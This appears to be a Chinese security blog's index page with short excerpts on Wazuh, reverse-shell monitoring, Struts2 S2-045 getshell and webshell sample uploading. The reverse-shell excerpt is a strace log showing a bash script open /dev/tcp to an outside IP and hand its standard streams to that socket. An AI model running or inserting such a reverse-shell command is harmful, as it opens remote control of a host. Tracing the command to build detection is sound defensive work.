Wazuh搭建

WAZUH架构图

分布式

wazuh_distributed

阅读更多

反弹shell监控

一、跟踪系统调用

1. strace bash test.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
[email protected]:~/pirogue/reverse_shell# strace bash test.sh 
execve("/bin/bash", ["bash", "test.sh"], [/* 50 vars */]) = 0
brk(NULL) = 0x7a2000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fcafdb87000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=128554, ...}) = 0
mmap(NULL, 128554, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb67000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libtinfo.so.5", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\315\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0644, st_size=170776, ...}) = 0
mmap(NULL, 2267936, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fcafd73d000
mprotect(0x7fcafd762000, 2097152, PROT_NONE) = 0
mmap(0x7fcafd962000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x25000) = 0x7fcafd962000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\200\r\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0644, st_size=14640, ...}) = 0
mmap(NULL, 2109680, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fcafd539000
mprotect(0x7fcafd53c000, 2093056, PROT_NONE) = 0
mmap(0x7fcafd73b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7fcafd73b000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320\3\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1689360, ...}) = 0
mmap(NULL, 3795360, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fcafd19a000
mprotect(0x7fcafd32f000, 2097152, PROT_NONE) = 0
mmap(0x7fcafd52f000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x195000) = 0x7fcafd52f000
mmap(0x7fcafd535000, 14752, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fcafd535000
close(3) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fcafdb65000
arch_prctl(ARCH_SET_FS, 0x7fcafdb65b40) = 0
mprotect(0x7fcafd52f000, 16384, PROT_READ) = 0
mprotect(0x7fcafd73b000, 4096, PROT_READ) = 0
mprotect(0x7fcafd962000, 16384, PROT_READ) = 0
mprotect(0x700000, 12288, PROT_READ) = 0
mprotect(0x7fcafdb8a000, 4096, PROT_READ) = 0
munmap(0x7fcafdb67000, 128554) = 0
open("/dev/tty", O_RDWR|O_NONBLOCK) = 3
close(3) = 0
brk(NULL) = 0x7a2000
brk(0x7a3000) = 0x7a3000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
brk(0x7a4000) = 0x7a4000
open("/usr/share/locale/locale.alias", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=2995, ...}) = 0
brk(0x7a6000) = 0x7a6000
read(3, "# Locale name alias data base.\n#"..., 4096) = 2995
brk(0x7a7000) = 0x7a7000
brk(0x7a8000) = 0x7a8000
read(3, "", 4096) = 0
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_IDENTIFICATION", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_IDENTIFICATION", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=368, ...}) = 0
mmap(NULL, 368, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb86000
close(3) = 0
open("/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=26258, ...}) = 0
mmap(NULL, 26258, PROT_READ, MAP_SHARED, 3, 0) = 0x7fcafdb7f000
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_MEASUREMENT", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_MEASUREMENT", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=23, ...}) = 0
mmap(NULL, 23, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7e000
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_TELEPHONE", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_TELEPHONE", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=59, ...}) = 0
mmap(NULL, 59, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7d000
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_ADDRESS", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_ADDRESS", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=167, ...}) = 0
mmap(NULL, 167, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7c000
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_NAME", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_NAME", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=77, ...}) = 0
mmap(NULL, 77, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7b000
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_PAPER", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_PAPER", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=34, ...}) = 0
mmap(NULL, 34, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7a000
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_MESSAGES", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_MESSAGES", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
close(3) = 0
open("/usr/lib/locale/en_US.utf8/LC_MESSAGES/SYS_LC_MESSAGES", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=57, ...}) = 0
mmap(NULL, 57, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb79000
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_MONETARY", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_MONETARY", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=286, ...}) = 0
mmap(NULL, 286, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb78000
close(3) = 0
brk(0x7a9000) = 0x7a9000
open("/usr/lib/locale/en_US.UTF-8/LC_COLLATE", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_COLLATE", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=1244054, ...}) = 0
mmap(NULL, 1244054, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafda35000
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_TIME", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_TIME", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=2454, ...}) = 0
mmap(NULL, 2454, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb77000
close(3) = 0
brk(0x7aa000) = 0x7aa000
open("/usr/lib/locale/en_US.UTF-8/LC_NUMERIC", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_NUMERIC", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=54, ...}) = 0
mmap(NULL, 54, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb76000
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_CTYPE", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_CTYPE", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=328180, ...}) = 0
mmap(NULL, 328180, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafd9e4000
close(3) = 0
brk(0x7ab000) = 0x7ab000
getuid() = 0
getgid() = 0
geteuid() = 0
getegid() = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
ioctl(-1, TIOCGPGRP, 0x7ffeed7229ac) = -1 EBADF (Bad file descriptor)
sysinfo({uptime=195741, loads=[21312, 14080, 6432], totalram=4148080640, freeram=202342400, sharedram=510382080, bufferram=24547328, totalswap=2145382400, freeswap=1889628160, procs=584, totalhigh=0, freehigh=0, mem_unit=1}) = 0
brk(0x7ac000) = 0x7ac000
rt_sigaction(SIGCHLD, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGCHLD, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGTSTP, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTSTP, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGTTIN, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTTIN, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGTTOU, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTTOU, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_IGN, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
uname({sysname="Linux", nodename="Kali", ...}) = 0
brk(0x7b0000) = 0x7b0000
brk(0x7b2000) = 0x7b2000
brk(0x7b4000) = 0x7b4000
brk(0x7b5000) = 0x7b5000
brk(0x7b6000) = 0x7b6000
brk(0x7b7000) = 0x7b7000
brk(0x7b8000) = 0x7b8000
stat("/root/pirogue/reverse_shell", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/root", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/root/pirogue", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/root/pirogue/reverse_shell", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/root/pirogue", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
getpid() = 4833
brk(0x7b9000) = 0x7b9000
getppid() = 4831
stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/usr/local/sbin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
stat("/usr/sbin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
stat("/usr/bin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
stat("/sbin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
geteuid() = 0
getegid() = 0
getuid() = 0
getgid() = 0
access("/bin/bash", X_OK) = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
geteuid() = 0
getegid() = 0
getuid() = 0
getgid() = 0
access("/bin/bash", R_OK) = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
geteuid() = 0
getegid() = 0
getuid() = 0
getgid() = 0
access("/bin/bash", X_OK) = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
geteuid() = 0
getegid() = 0
getuid() = 0
getgid() = 0
access("/bin/bash", R_OK) = 0
getpid() = 4833
brk(0x7ba000) = 0x7ba000
brk(0x7bb000) = 0x7bb000
getpgrp() = 4831
ioctl(2, TIOCGPGRP, [4831]) = 0
rt_sigaction(SIGCHLD, {sa_handler=0x44cf90, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, 8) = 0
getrlimit(RLIMIT_NPROC, {rlim_cur=15710, rlim_max=15710}) = 0
brk(0x7bc000) = 0x7bc000
brk(0x7bd000) = 0x7bd000
rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
brk(0x7be000) = 0x7be000
open("test.sh", O_RDONLY) = 3
stat("test.sh", {st_mode=S_IFREG|0644, st_size=73, ...}) = 0
ioctl(3, TCGETS, 0x7ffeed722940) = -1 ENOTTY (Inappropriate ioctl for device)
lseek(3, 0, SEEK_CUR) = 0
read(3, "exec 9<> /dev/tcp/130.182.116.111"..., 80) = 73
lseek(3, 0, SEEK_SET) = 0
getrlimit(RLIMIT_NOFILE, {rlim_cur=1024, rlim_max=4*1024}) = 0
fcntl(255, F_GETFD) = -1 EBADF (Bad file descriptor)
dup2(3, 255) = 255
close(3) = 0
fcntl(255, F_SETFD, FD_CLOEXEC) = 0
fcntl(255, F_GETFL) = 0x8000 (flags O_RDONLY|O_LARGEFILE)
fstat(255, {st_mode=S_IFREG|0644, st_size=73, ...}) = 0
lseek(255, 0, SEEK_CUR) = 0
brk(0x7bf000) = 0x7bf000
read(255, "exec 9<> /dev/tcp/130.182.116.111"..., 73) = 73
brk(0x7c0000) = 0x7c0000
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(2323), sin_addr=inet_addr("130.182.116.111")}, 16) = 0
fcntl(9, F_GETFD) = -1 EBADF (Bad file descriptor)
dup2(3, 9) = 9
close(3) = 0
fcntl(0, F_GETFD) = 0
fcntl(0, F_DUPFD, 10) = 10
fcntl(0, F_GETFD) = 0
fcntl(10, F_SETFD, FD_CLOEXEC) = 0
dup2(9, 0) = 0
fcntl(9, F_GETFD) = 0
close(10) = 0
fcntl(1, F_GETFD) = 0
fcntl(1, F_DUPFD, 10) = 10
fcntl(1, F_GETFD) = 0
fcntl(10, F_SETFD, FD_CLOEXEC) = 0
dup2(9, 1) = 1
fcntl(9, F_GETFD) = 0
fcntl(2, F_GETFD) = 0
fcntl(2, F_DUPFD, 10) = 11
fcntl(2, F_GETFD) = 0
fcntl(11, F_SETFD, FD_CLOEXEC) = 0
dup2(1, 2) = 2
fcntl(1, F_GETFD) = 0
close(11) = 0
close(10) = 0
brk(0x7c1000) = 0x7c1000
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7fcafdb65e10) = 4834
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGINT, {sa_handler=0x449930, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], 0, NULL) = 4834
rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=0x449930, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=4834, si_uid=0, si_status=127, si_utime=0, si_stime=0} ---
wait4(-1, 0x7ffeed722010, WNOHANG, NULL) = -1 ECHILD (No child processes)
rt_sigreturn({mask=[]}) = 0
read(255, "", 73) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
exit_group(127) = ?
+++ exited with 127 +++

阅读更多

甲方安全建设步骤

在深圳丰盛町星巴克的一个下午,两杯咖啡,可能是可预测的未来几年里最后一次向0x001面对面学习的机会。

1. 资产梳理

  • IP列表、业务分组(负责人、联系方向)、业务属性
  • 业务端口
  • 业务应用架构、技术堆栈

阅读更多

2年乙方安全从业经验谈

  在写这篇文章的之前,我会考虑尽量把身边朋友和公司的“事故性”信息避开,只跟自己对话。

阅读更多

w3af 二次开发手记

w3af 常用命令

    阅读更多

    peepingtom for windows

    工具效果截图

    peepingtom

    阅读更多

    tornado-durex-Web自动化攻击平台-开发手记(一)

    参数handlers

    1
    app = tornado.web.Application(handlers=[(r"/", IndexHandler)])

    阅读更多

    hexo留言板从多说迁移到网易云跟帖

    迁移原因

    1
    2
    3
    重要通知: 多说即将关闭
    多说网 发表于 3月21日
    因公司业务调整,非常遗憾的向大家宣布多说项目即将关闭。 我们将于2017年6月1日正式关停服务,在此之前您可以通过后台的数据导出功能导出自己站点的评论数据。 对此给您造成的不便,我们深表歉意,感谢您的一路相伴。

    阅读更多

    s2-045真正一键getshell菜刀马-突破任何限制

    综述

    Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
    该漏洞能够通过构造恶意的Content-Type值来执行任意代码。 如果Content-Type值无效,则会抛出异常,并向用户显示错误消息,从而能够进一步获取服务器权限。

    阅读更多

    python使用poster模块上传文件和表单

    代码说明

    写这个脚本的时候是为了可以自动批量上传webshell样本到后台的样本库中,方便后面的其他处理工作。

    涉及知识点

    • poster模块
    • http代理
    • http auth认证

    阅读更多